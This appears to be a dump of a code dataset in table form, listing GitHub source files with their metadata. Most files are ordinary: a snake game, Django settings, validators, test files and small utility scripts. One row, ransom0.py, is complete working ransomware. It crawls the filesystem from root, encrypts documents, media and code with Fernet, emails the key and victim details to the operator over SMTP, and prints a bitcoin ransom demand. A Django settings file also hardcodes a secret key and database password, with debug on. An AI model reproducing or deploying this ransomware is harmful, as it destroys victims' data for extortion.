blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
195b5b5bf3d61d63758c2c4cdb7d1942a70e832d | 3f5d531abcf69bc9f7de317ce46d45786272013d | /src/config/test/test_default.py | 7711ddcd42e45b5fc7232a940a9bceb55d370e5a | [
"MIT"
] | permissive | thak123/i-tagger | 61a8880e250069fc40c0a616e718a739bd27cb58 | dd8502947011e95b72b243fad9aad094b9a7d15c | refs/heads/master | 2021-05-14T16:51:20.799677 | 2018-01-02T12:09:36 | 2018-01-02T12:09:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 477 | py | import unittest
from helpers.config_helper import *
from config.default import create_default_config
class TestDefault(unittest.TestCase):
def test_creation(self):
config_helper = ConfigManager("/tmp/config.ini")
if not os.path.exists("/tmp/config.ini"):
create_default_config(config_helper)
self.assertEqual(os.path.exists("/tmp/config.ini"), True)
self.assertEqual(config_helper.get_item("Schema", "text_column"), "word")
| [
"mageswaran1989@gmail.com"
] | mageswaran1989@gmail.com |
c9ac64bedd8d34cd9d725f1978fa81157b1a3b7e | f56892b1bafd7bcf0592f42bc60245e0a7cd2baa | /ransom0.py | 64e12a801cb65059ed6512c33b40774e37e5e086 | [
"MIT"
] | permissive | henrytriplette/Ransom0 | 3f82da60cac4870b2cdb921983d40f4d66bbdfb6 | 3c732a1644e0ad8af83f5a619f2d3521496a8e97 | refs/heads/master | 2022-12-21T01:04:49.499813 | 2020-09-19T06:41:28 | 2020-09-19T06:41:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,545 | py | import os, platform, random, smtplib, ssl, socket, shutil, subprocess
from os import system, name
from requests import get
from datetime import datetime
from progress.bar import Bar
from progress.spinner import Spinner
from cryptography.fernet import Fernet
key = Fernet.generate_key()
username = os.getlogin()
digits = random.randint(1111,9999)
time_now = datetime.now().time()
hostname = socket.gethostname()
IP = get('https://api.ipify.org').text
PATH = os.getcwd()
# Email Settings
port = 587
smtp_server = "" # Enter the smtp server of your email provider
sender_email = "" # Enter your address
receiver_email = "" # Enter receiver address
password = "" # your email password
extensions = (
# '.exe,', '.dll', '.so', '.rpm', '.deb', '.vmlinuz', '.img', # SYSTEM FILES - BEWARE! MAY DESTROY SYSTEM!
'.jpg', '.jpeg', '.bmp', '.gif', '.png', '.svg', '.psd', '.raw', # images
'.mp3','.mp4', '.m4a', '.aac','.ogg','.flac', '.wav', '.wma', '.aiff', '.ape', # music and sound
'.avi', '.flv', '.m4v', '.mkv', '.mov', '.mpg', '.mpeg', '.wmv', '.swf', '.3gp', # Video and movies
'.doc', '.docx', '.xls', '.xlsx', '.ppt','.pptx', # Microsoft office
'.odt', '.odp', '.ods', '.txt', '.rtf', '.tex', '.pdf', '.epub', '.md', '.txt', # OpenOffice, Adobe, Latex, Markdown, etc
'.yml', '.yaml', '.json', '.xml', '.csv', # structured data
'.db', '.sql', '.dbf', '.mdb', '.iso', # databases and disc images
'.html', '.htm', '.xhtml', '.php', '.asp', '.aspx', '.js', '.jsp', '.css', # web technologies
'.c', '.cpp', '.cxx', '.h', '.hpp', '.hxx', # C source code
'.java', '.class', '.jar', # java source code
'.ps', '.bat', '.vb', '.vbs' # windows based scripts
'.awk', '.sh', '.cgi', '.pl', '.ada', '.swift', # linux/mac based scripts
'.go', '.py', '.pyc', '.bf', '.coffee', # other source code files
'.zip', '.tar', '.tgz', '.bz2', '.7z', '.rar', '.bak', # compressed formats
)
# Text to display
RANSOM_TEXT = """
To get the decryption key, please send 50$ in bitcoin to BITCOIN ADRESS
And send proof of transfer, your id and your name to EMAIL ADRESS
"""
#Clear Screen Function
def clear():
if name == 'nt':
_ = system('cls')
else:
_ = system('clear')
def DISPLAY():
print("""
____ ___
| _ \ __ _ _ __ ___ ___ _ __ ___ / _ \
| |_) / _` | '_ \/ __|/ _ \| '_ ` _ \| | | |
| _ < (_| | | | \__ \ (_) | | | | | | |_| |
|_| \_\__,_|_| |_|___/\___/|_| |_| |_|\___/
""")
print("Time: {}".format(time_now))
print("IP Adress: {}".format(IP))
print("Platform: {}".format(platform.system()))
print("Hostname: {}".format(hostname))
print("User: {}".format(username))
print("ID: {}".format(str(digits)))
print()
def FindFiles():
load_state = 0
spinner = Spinner('Finding Files ')
while load_state != 'FINISHED':
f = open("logs/path.txt", "a")
cnt = 0
for root, dirs, files in os.walk("/"):
# for root, files in os.walk("/YOUR/TESTING/DIRECTORY"):
for file in files:
if file.endswith(extensions):
cnt += 1
TARGET = os.path.join(root, file)
f.write(TARGET+'\n')
spinner.next()
f.close()
load_state = 'FINISHED'
print()
print("Found {} target files".format(cnt))
print()
f = open("logs/cnt.txt", "w")
f.write(str(cnt))
f.close()
def encrypt(filename):
f = Fernet(key)
with open(filename, "rb") as file:
file_data = file.read()
encrypted_data = f.encrypt(file_data)
with open(filename, "wb") as file:
file.write(encrypted_data)
def StartRansom():
DISPLAY()
FindFiles()
f = open("logs/cnt.txt", "r")
cnt = f.read()
f.close()
with Bar('Encrypting', max=int(cnt)) as bar:
filepath = 'logs/path.txt'
with open(filepath) as fp:
line = fp.readline()
while line:
filename = line.strip()
try:
encrypt(filename)
except Exception:
print("!Permission denied")
pass
line = fp.readline()
bar.next()
fp.close()
print()
SendData()
clear()
DecyptMessage(False)
def decrypt(filename):
f = open("logs/key_data.txt", "r")
key = f.read()
f.close()
f = Fernet(key)
with open(filename, "rb") as file:
encrypted_data = file.read()
decrypted_data = f.decrypt(encrypted_data)
with open(filename, "wb") as file:
file.write(decrypted_data)
def DecyptMessage(INVALID_KEY):
clear()
DISPLAY()
if INVALID_KEY == True:
print("Invalid Key !")
else:
pass
print(RANSOM_TEXT)
key_data = input('key: ')
f = open("logs/key_data.txt", "w")
f.write(key_data)
f.close()
with open('logs/path.txt') as fp:
line = fp.readline()
while line:
filename = line.strip()
try:
decrypt(filename)
except PermissionError:
print("!Permission Denied")
pass
except Exception:
DecyptMessage(True)
line = fp.readline()
print("Your file have been decrypted")
fp.close()
shutil.rmtree(PATH+'/logs', ignore_errors=True)
exit()
def SendData():
DataSend = ("""
time: {}
IP: {}
Hostname: {}
username: {}
id: {}
key: {}
""").format(time_now, IP, hostname, username, str(digits), str(key))
print("Sending Data")
context = ssl.create_default_context()
with smtplib.SMTP(smtp_server, port) as server:
server.ehlo() # Can be omitted
server.starttls(context=context)
server.ehlo() # Can be omitted
server.login(sender_email, password)
server.sendmail(sender_email, receiver_email, DataSend)
if __name__ == '__main__':
# Generate digits ID or read generated value from digits.txt
if os.path.isfile("logs/digits.txt") == True:
f = open("logs/digits.txt", "r")
digits = f.read()
f.close()
DecyptMessage(False)
else:
os.mkdir("logs")
f = open("logs/digits.txt", "w")
f.write(str(digits))
f.close()
StartRansom()
| [
"noreply@github.com"
] | henrytriplette.noreply@github.com |
51e421ccc5508357725d9bd56f44da9843cecb39 | 5cb3b5f0f4eea484bf8f5fcd293d9952522b68cd | /Snake/scripts/Map.py | b80312d8b44ddf2e5887900e5e8e68be43018571 | [] | no_license | borkode/python-games | 61c65e80d53e986edd10fd51fa3e51d5aaf5b527 | 7f47b0c28d46142c33f2323709410f51dbbb4989 | refs/heads/master | 2020-04-22T13:01:52.483268 | 2019-02-12T21:23:28 | 2019-02-12T21:23:28 | 170,394,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,770 | py | import time,random,os,math
from scripts import Draw, PiControl
global yp,xp,screen,foodBeingEaten
yp=0
xp=0
foodBeingEaten = True
sz = [40,20]
global snakex,snakey,sheadp,blockInFront,snakelength
snakex = []
snakey = []
sheadp = [round(sz[0]/2),round(sz[1]/2)]
blockInFront = 0
snakelength = 0
displaylen = 0
def createBlankGraph(size,filler):
width = size[0]
height = size[1]
blank = []
for i in range(width*height):
blank.append(filler)
return blank
Map = createBlankGraph(sz,0)
def placeFood(filler):
for i in range(len(Map)):
if Map[i]==filler:
Map[i]=0
break
rndm = round(random.random()*len(Map))
while True:
rndm = round(random.random()*len(Map))
try:
if Map[rndm]!=2:
Map[rndm]=filler
break
except:
continue
return rndm
def setXY(x,y,setTo):
Map[y*sz[0]+x] = setTo
return y*sz[0]+x
def retXY(x,y):
return Map[y*sz[0]+x]
def retID(x,y):
return y*sz[0]+x
def checkSnakeCollide(headp):
headx = headp[0]
heady = headp[1]
Colliding = False
for i in range(len(snakex)):
if snakex[i] == headx and snakey[i] == heady and i!=snakelength-1:
Colliding = True
return Colliding
z = 0
MoveNotUsed = True
while True:
try:
if PiControl.buttonChecked('w') and yp!=1 and MoveNotUsed:
yp=-1
xp=0
MoveNotUsed = False
elif PiControl.buttonChecked('a') and xp!=1 and MoveNotUsed:
yp=0
xp=-1
MoveNotUsed = False
elif PiControl.buttonChecked('s') and yp!=-1 and MoveNotUsed:
yp=1
xp=0
MoveNotUsed = False
elif PiControl.buttonChecked('d') and xp!=-1 and MoveNotUsed:
yp=0
xp=1
MoveNotUsed = False
if z == 30:
os.system('cls' if os.name == 'nt' else 'clear')
Map = createBlankGraph(sz,0)
Draw.setMap(Map,sz)
if foodBeingEaten:
food = placeFood(1)
foodBeingEaten = False
try:
setXY(sheadp[0],sheadp[1],2)
except:
break
Map[food] = 1
if displaylen > snakelength:
snakelength+=1
sheadp[0]=sheadp[0]+xp
sheadp[1]=sheadp[1]+yp
snakex.append(sheadp[0])
snakey.append(sheadp[1])
if len(snakex)>snakelength and len(snakey)>snakelength:
del snakex[0]
del snakey[0]
for i in range(len(snakex)):
try:
setXY(snakex[i],snakey[i],2)
except:
break
if sheadp[0]<=-1 or sheadp[0]>sz[0] or sheadp[1]<=-1 or sheadp[1]>sz[1] or checkSnakeCollide(sheadp):
break
if retID(sheadp[0],sheadp[1]) == food:
foodBeingEaten = True
displaylen+=4
Draw.drawMap()
z=0
MoveNotUsed = True
time.sleep(1/300)
z+=1
except:
continue
from scripts import lose
lose.Lose(snakelength) | [
"31637006+borkode@users.noreply.github.com"
] | 31637006+borkode@users.noreply.github.com |
52ea1aca32edac67971b05ce6d74097b20e17139 | f41b18b62c238dfca0b8b3d082c74fc290020337 | /ccadb2_ui/config/urls.py | eb2e53cc9efa2703d7be5aa26620ff77d271c747 | [
"CC0-1.0"
] | permissive | cfpb/credit-card-agreements-ui | a15b705eb9f78d617d02e2c0b681e86eb9ad7bef | 267d8eb3113e0c25f1ddfff79160094cce11f4ff | refs/heads/master | 2021-05-05T10:11:58.126365 | 2020-06-25T20:21:58 | 2020-06-25T20:21:58 | 117,900,942 | 2 | 2 | NOASSERTION | 2021-03-12T13:42:03 | 2018-01-17T22:33:59 | JavaScript | UTF-8 | Python | false | false | 139 | py | from django.conf.urls import url
from ccadb2_ui.views import CCADB2MainView
urlpatterns = [
url(r'^.*$', CCADB2MainView.as_view()),
]
| [
"chris@contolini.com"
] | chris@contolini.com |
e7743ee545024ec02333a7a4c2ad6adff4fd375f | b27617325980aecb2f70e64762a767d777fdeeaa | /test.py | a309ad6dd67a957d86eaedc7757e58c8b7491da7 | [] | no_license | HuyaAuto/huya_barrage | 0c78527f194caf48c7021bced4cbf79c251b1890 | c4f840fe1b20085a82daf4731a879049dd561c1c | refs/heads/master | 2023-02-28T09:04:24.388580 | 2021-02-03T12:30:55 | 2021-02-03T12:30:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 838 | py | import html
import pickle
import re
import sys
import urllib.parse
from huya_login import HuyaDriver
def get_cookies():
driver = HuyaDriver('520667')
driver.colse()
def read_cookies():
with open("./cookie/cookies.pkl", "rb") as cookiefile:
cookies = pickle.load(cookiefile)
cookie = [item["name"] + "=" + item["value"] for item in cookies]
cookiestr = ';'.join(item for item in cookie)
for c in cookie:
if 'yyuid' in c:
yyuid = c.split('=')[1]
print(cookie)
print(yyuid)
def unescape(string):
string = urllib.parse.unquote(string)
quoted = html.unescape(string).encode(sys.getfilesystemencoding()).decode('utf-8')
# 转成中文
return re.sub(r'%u([a-fA-F0-9]{4}|[a-fA-F0-9]{2})', lambda m: chr(int(m.group(1), 16)), quoted)
| [
"1106617567@qq.com"
] | 1106617567@qq.com |
9f9ddf99a5f28e3a1cf0ff4f6cd0c5dd0a491853 | 75b52bec6d340fb367ad1bee359aa5bbf7a7aeef | /dnsdb_common/library/validator.py | e94348093453faa0e0e2056b21556df3d96f1fcd | [
"Apache-2.0"
] | permissive | cclauss/open_dnsdb | 40fd36333ebec11e6c49e819dddaa71fa0a0147d | 28c2055685be1c173d77eaa2a05d8e156ccbbbf2 | refs/heads/master | 2020-04-18T02:48:04.865234 | 2019-01-23T08:00:53 | 2019-01-23T08:00:53 | 167,176,467 | 1 | 0 | Apache-2.0 | 2019-01-23T12:04:21 | 2019-01-23T12:04:20 | null | UTF-8 | Python | false | false | 2,037 | py | # -*- coding: utf-8 -*-
import re
def _match_pattern(pattern, string):
ptn = re.search(r'(%s)' % pattern, string)
if ptn is None:
return False
if len(ptn.groups()) == 0:
return False
return ptn.group(1) == string
def valid_string(s, min_len=None, max_len=None,
allow_blank=False, auto_trim=True, pattern=None):
"""
@param s str/unicode 要校验的字符串
@param min_len None/int
@param max_len None/int
@param allow_blank boolean
@param auto_trim boolean
@:param pattern re.pattern
@return boolean is_ok
@return string/int value 若是ok,返回int值,否则返回错误信息
"""
if s is None:
return False, u'不能为None'
if not isinstance(s, basestring):
return False, u"参数类型需要是字符串"
if auto_trim:
s = s.strip()
str_len = len(s)
if not allow_blank and str_len < 1:
return False, u"参数不允许为空"
if max_len is not None and str_len > max_len:
return False, u"参数长度需小于%d" % max_len
if min_len is not None and str_len < min_len:
return False, u"参数长度需大于 %d" % min_len
if pattern is not None and s and not _match_pattern(pattern, s):
return False, u'参数包含的字符: %s' % pattern
return True, s
def valid_int(s, min_value=None, max_value=None):
"""\
@param s str/unicode 要校验的字符串
@param min_value None/int
@param max_value None/int
@return boolean is_ok
@return string/int value 若是ok,返回int值,否则返回错误信息
"""
if s is None:
return False, "cannot is None"
if not isinstance(s, basestring):
return False, "must a string value"
s = int(s)
if max_value is not None and s > max_value:
return False, "%d must less than %d" % (s, max_value)
if min_value is not None and s < min_value:
return False, "%d must greater than %d" % (s, min_value)
return True, s
| [
"20832776@qunar.com"
] | 20832776@qunar.com |
be629528e4eaace2669ba51d420be9465af6073d | 3bbf0da46ac3393ef10f4f795092895b20794121 | /initialize_app.py | fc598333ac0d0a8538c5d77489f4b09cc4cab756 | [] | no_license | maxcnunes/i-sweated-yesterday | 3bffacbb779f99d50cb5051e4abb1cd7d4322e67 | 1eaa4033b555f62053f3ea9dda345a8a1c172846 | refs/heads/master | 2020-05-18T19:44:32.022693 | 2013-08-06T04:00:09 | 2013-08-06T04:00:09 | 7,216,338 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 72 | py | from app import app as application
application.run(debug=True,port=8090) | [
"maxcnunes@gmail.com"
] | maxcnunes@gmail.com |
6d5c7cd0e3bc220593ce62b828057872ace141ca | f2a93ef5a3083d0eeb59298e7e1a723898446bc2 | /Functions_Intro/banner.py | 57698ed22c82276a6de24848c87d76a31ec987fd | [] | no_license | AndreUTF/PythonProjects | 16fa017519c8487a4b46a433fc16d74864270f63 | 8d4aab3c52afc37f283785e4f9fa5932ec1cc905 | refs/heads/master | 2022-12-24T02:43:01.766245 | 2020-10-02T20:54:23 | 2020-10-02T20:54:23 | 299,713,156 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,671 | py | def banner_text(text: str = " ", screen_width: int = 80) -> None:
""" Print a string centred, with ** either side.
:param text: The string to print.
An asterisk (*) will result in a row of asterisks.
The default will print a blank line, with a ** border at
the left and right edges.
:param screen_width: The overall width to print within
(including the 4 spaces for the ** either side).
:raises ValueError: if the supplied string is too long to fit.
"""
if len(text) > screen_width - 4:
raise ValueError("String '{0}' is larger than specified width {1}"
.format(text, screen_width))
if text == "*":
print("*" * screen_width)
else:
centred_text = text.center(screen_width - 4)
output_string = "**{0}**".format(centred_text)
print(output_string)
def banner_text1(text=" ", screen_width=80):
screen_width = 80
if len(text) > screen_width - 4:
raise ValueError("String {0} is larger then specified width {1}"
.format(text, screen_width))
if text == "*":
print("*" * screen_width)
else:
centred_text = text.center(screen_width-4)
output_string = "**{0}**".format(centred_text)
print(output_string)
banner_text("*", 60)
banner_text("Always look on the bright side of life...", 60)
banner_text("If life seems jolly rotten,", 60)
banner_text("There's something you've forgotten!", 60)
banner_text("And that's to laugh and smile and dance and sing,", 60)
banner_text(screen_width=60)
banner_text("When you're feeling in the dumps,", 60)
banner_text("Don't be silly chumps,", 60)
banner_text("Just purse your lips and whistle - that's the thing!", 60)
banner_text("And... always look on the bright side of life...", 60)
banner_text("*", 60)
# result = banner_text("Nothing is returned")
# print(result)
banner_text1("*", 60)
banner_text1("Always look on the bright side of life...", 60)
banner_text1("If life seems jolly rotten,", 60)
banner_text1("There's something you've forgotten!", 60)
banner_text1("And that's to laugh and smile and dance and sing,", 60)
banner_text1(screen_width=70)
banner_text1("When you're feeling in the dumps,", 60)
banner_text1("Don't be silly chumps,", 60)
banner_text1("Just purse your lips and whistle - that's the thing!", 60)
banner_text1("And... always look on the bright side of life...", 60)
banner_text1("*", 60)
# numbers = [4, 2, 7, 5, 8, 3, 9, 6, 1]
# print(numbers.sort())
# numbers = [4, 2, 7, 5, 8, 3, 9, 6, 1]
# numbers.sort()
# print(numbers)
| [
"noreply@github.com"
] | AndreUTF.noreply@github.com |
2a16450cb4f5cfeb4ffc27c9b5c5a1b70952126a | b808c2842ea6d3beaa80aed6f107bde79542a6af | /python.py | 4ff001303867a884d50a3ca89072bff12bc5f925 | [] | no_license | LinXiaAA/chuntian | 6c9cc9e84eb211bb0a22dcdd823ff46bac53583c | 318175d1156d30bb94a7aef37dba6564d3df7f2c | refs/heads/master | 2022-12-16T14:19:55.148680 | 2020-09-17T04:51:35 | 2020-09-17T04:51:35 | 296,221,533 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 692 | py | # -*- coding: utf-8 -*-
import serial
import struct
import requests
url = ""
def pushup(loadup):
try:
re = requests.get(url, data = loadup)
r.raise_for_status()
return re.text
except:
return "HTTP ERROR"
if __name__ == "_main_":
arduino = serial.Serial('/dev/ttyUSB0', 57600, timeout=.1)
while True:
if arduino.readline() == b'DUANWEIMING\n':
data = arduino.read(12)
bpm, IR_signalSize, xy, time = struct.unpack("<hhfL", data)
data = {"bpm":bpm, "ir":IR_signalSize, "xy":xy, "time":time}
pushup(data)
print("bpm:"+bpm+"\nir:"+IR_signalSize+"\n血氧:"+xy+"\n时间:"+time)
| [
"noreply@github.com"
] | LinXiaAA.noreply@github.com |
1bc8dcec7ce59d12a22ca5f3caf013473edf67eb | 3f93a0c460ab63d6723103ec7bc7bc125612ebd2 | /plugin/gestureLogic/GestureAlgorithm.py | b7c5dc5f23991fd3f249ba788a55658a63a71fbc | [] | no_license | umlfri-old/addon_gestures | 88eb85473739b719e8f93b894c395a208594c3a4 | 3d85b8a7c463e1ca06c1e9048aa41482d74f5c78 | refs/heads/master | 2021-01-20T16:35:41.118668 | 2011-03-20T19:28:53 | 2011-03-20T19:28:53 | 90,841,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,187 | py | class CGestureAlgorithm(object):
"""
Interface for any recognition algorithm.
"""
def __init__(self):
"""
Constructor of class CGestureAlgorithm.
"""
#algorithm name
self.name = ''
#algorithm ID
self.algorithmID = 0
#current gesture coordinates
self.coordinates = []
#well known gestures(CGestureSet)
self.patternGestures = []
def Recognition(self,type):
"""
Function which recognize gesture.
@type type: string
@param type: gesture type
"""
pass
def SetCoordinates(self,coor):
"""
Coordinates setter.
@type coor: list
@param coor: gesture coordinates
"""
self.coordinates = coor
def GetCoordinates(self):
"""
Coordinates getter
@rtype : list
@return: gesture coordinates
"""
return self.coordinates
def DeleteCoordinates(self):
"""
Delete current coordinates.
"""
del self.coordinates[:] | [
"pasikavec@gmail.com"
] | pasikavec@gmail.com |
17af632bafeab7fe05ec6df418b301f86f74b0cb | 582df95fc9b1d00e6c75321ad6a7894e0722245e | /tests/test_download_model.py | 34baadec66352e161086017e45cd3ea66aadfa94 | [
"Apache-2.0"
] | permissive | viniarck/podcaststore-django | 2c4db217126e3dbdf1244bb22ae1aea0cd502874 | 90316ffb18793b089291a0e28ac3ee2bb5e458cb | refs/heads/master | 2020-06-29T13:16:18.449358 | 2019-12-05T11:44:34 | 2019-12-05T11:44:34 | 200,547,759 | 0 | 0 | Apache-2.0 | 2020-06-05T22:33:18 | 2019-08-04T22:29:38 | Python | UTF-8 | Python | false | false | 828 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import pytest
from podcaststore_api.models.download import Download, DownloadSerializer
class TestDownloadModel:
"""TestDownloadModel."""
@pytest.mark.django_db
def test_repr(self, create_download: Download) -> None:
"""Test __repr__ method."""
download = create_download
assert (
repr(download)
== f"Download({download.id}, {download.track_id}, {download.date})"
)
class TestTagSerializer:
"""TestTagSerializer"""
@pytest.mark.django_db
def test_ser_data(self, create_download: Download) -> None:
"""Test serialization data."""
download_serd = DownloadSerializer(create_download)
for field in ("id", "track_id", "date"):
assert field in download_serd.data
| [
"viniarck@gmail.com"
] | viniarck@gmail.com |
25d2042a734b11a8bb5cabcf79b3bc9e896b5d99 | 12edaaeca754e0d347a584d8c05fe88d5ea9f8e5 | /test.py | 9bf1a3a476c7e750712783a509b870d8e51960be | [] | no_license | silasburger/lyft-technical-sample | 521d3ea8914627d7241dd876f259c5df497877b1 | 9748f14cb157d9a4951f6df9db28ce7468bd408c | refs/heads/master | 2020-05-14T22:57:52.977222 | 2019-04-18T17:47:23 | 2019-04-18T17:47:23 | 181,988,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,653 | py | from app import app
from flask import jsonify
import unittest
from cut_string import cut_string
class ApplicationTest(unittest.TestCase):
def setUp(self):
"""Set up our test client"""
self.client = app.test_client()
def test_cut_string(self):
"""Unit test the cut_string function"""
self.assertEqual(cut_string('uiaytbjkc'), 'abc')
self.assertEqual(cut_string('qw'), '')
self.assertEqual(cut_string('wecvs'), "c")
def test_response(self):
"""Integration test of the /test route"""
response_odd = self.client.post('/test', json={
"string_to_cut":"iamyourlyftdriver",
})
response_even = self.client.post('/test', json={
"string_to_cut":"zxawub",
})
response_empty = self.client.post('/test', json={
"string_to_cut":"",
})
self.assertEqual(response_odd.json["return_string"], "muydv")
self.assertEqual(response_even.json["return_string"], "ab")
self.assertEqual(response_empty.json["return_string"], "")
def test_error_response(self):
"""Test that errors are being handled correctly"""
response_wrong_key = self.client.post('/test', json={
"string_to_cu":"iamyourlyftdriver",
})
response_not_string = self.client.post('/test', json={
"string_to_cut":2,
})
self.assertEqual(response_wrong_key.json["message"], "\"string_to_cut\" key not provided in body of request")
self.assertEqual(response_not_string.json["message"], "The value you provided is not a string")
| [
"ybsilas@gmail.com"
] | ybsilas@gmail.com |
7304e40e46fc2c54dfa722867c321f2c367920fb | ff8a38383b7fbb05cf2f660a8a4296a44859ff31 | /py-client/program_c2.py | ca25576d3d0b3f7fb34cf871f4d6764b81db252c | [] | no_license | sudeepalbal123/cs2910Project | d7cf0ac55569ffc6f6e7d7ff4388c8db2c63dc36 | 367dc032ee6b71d0199a85d4e66fd122dc3f3fdc | refs/heads/main | 2023-04-23T18:11:16.481058 | 2021-05-04T10:41:08 | 2021-05-04T10:41:08 | 364,197,805 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 350 | py | # Read the file created by first container
input_file = open("out.txt","r")
output_file = open("output.txt","w+")
# Read the file and count the unique letters from that file
while True:
line = input_file.readline()
if not line:
break
output_file.write(line)
input_file.close()
output_file.close()
| [
"sudeep.albal@gmail.com"
] | sudeep.albal@gmail.com |
14738cb6e89be7fa2dc18c2e0d95c3d9f63fcf63 | af4c325a5a20cb054f22723af9a693cdf8cda3e5 | /mysite/env/lib/python3.7/encodings/euc_kr.py | eadb6c4e18a9f3978efd0efea1024e9adac530cb | [] | no_license | myracheng/treehacks19 | aff1d6356f480dfdc4ca75f286fbcbd29c110a35 | 9e2d9195f749415eddcfabaceed0f9d911b12c7e | refs/heads/master | 2020-07-04T11:07:02.833157 | 2019-02-17T19:24:08 | 2019-02-17T19:24:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 58 | py | /Users/gracelu/anaconda3/lib/python3.7/encodings/euc_kr.py | [
"2018glu@tjhsst.edu"
] | 2018glu@tjhsst.edu |
24fdf4400900a69600e4a58c0e30e169a83a6651 | ec96561f6ca2ff91396a73f2622f70d8a01ee1ef | /the_school/the_school/settings.py | abe0461f80dedb0bcba387c514f6242fe11ddcfc | [] | no_license | diegolopezq95/teacher_student | d5d940d388f561542aff6bfb513cac0677cfd2a9 | d7d227eb178380393aac4ff81fca10cdeae77fd5 | refs/heads/master | 2023-08-24T22:34:42.048045 | 2020-05-28T18:08:01 | 2020-05-28T18:08:01 | 267,660,605 | 0 | 0 | null | 2021-09-22T19:06:40 | 2020-05-28T18:03:20 | JavaScript | UTF-8 | Python | false | false | 3,883 | py | """
Django settings for the_school project.
Generated by 'django-admin startproject' using Django 2.2.12.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'kv=&&t)umoo#9*8r9fa*!c@%b0i7m$4e$yelm#ay_y)6mqs81q'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'classroom',
'crispy_forms',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
]
ROOT_URLCONF = 'the_school.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
os.path.join(BASE_DIR, 'classroom/templates/'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'the_school.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'teacherstudent',
'USER': 'postgres',
'PASSWORD': 'root',
'HOST': 'localhost',
'PORT': '5432',
}
}
db_from_env = dj_database_url.config(conn_max_age=600)
DATABASES['default'].update(db_from_env)
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static'),
]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
AUTH_USER_MODEL = 'classroom.User'
LOGIN_URL = 'login'
LOGIN_REDIRECT_URL = 'home'
LOGOUT_REDIRECT_URL = 'home' | [
"927@holbertonschool.com"
] | 927@holbertonschool.com |
